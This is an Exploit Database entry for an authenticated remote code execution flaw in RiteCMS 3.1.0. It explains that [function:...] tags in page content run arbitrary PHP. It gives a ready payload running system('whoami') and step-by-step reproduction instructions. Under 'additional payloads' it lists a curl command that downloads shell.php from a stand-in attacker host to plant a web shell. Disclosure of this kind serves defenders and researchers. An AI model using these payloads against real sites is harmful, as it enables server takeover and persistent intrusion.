[webapps] RiteCMS 3.1.0 - Authenticated Remote Code Execution

EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING RiteCMS 3.1.0 - Authenticated Remote Code Execution EDB-ID: 52488 CVE: N/A EDB Verified: Author: RED Type: WEBAPPS Exploit:   /   Platform: MULTIPLE Date: 2026-04-06 Vulnerable App: # Exploit Title: RiteCMS 3.1.0 - Authenticated Remote Code Execution # Date: 2025-10-26 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://github.com/handylulu/RiteCMS # Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip # Version: 3.1.0 # Tested on: Windows XP ## Vulnerability Description RiteCMS v3.1.0 contains an authenticated Remote Code Execution (RCE) via its content_function() handler: [function:...] tags in page content are evaluated, allowing a user with page-editing privileges to execute arbitrary PHP on the server. ## Exploit Code Create or edit any page with the following content: [function:system('whoami')] ## Steps to Reproduce 1. Login as administrator 2. Create new page or edit existing page 3. Insert [function:system('whoami')] in content 4. Save and view page 5. Command output will be displayed ## additional payloads [function:system('curl http://attacker/shell.php -o shell.php')] [function:system('id')] Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services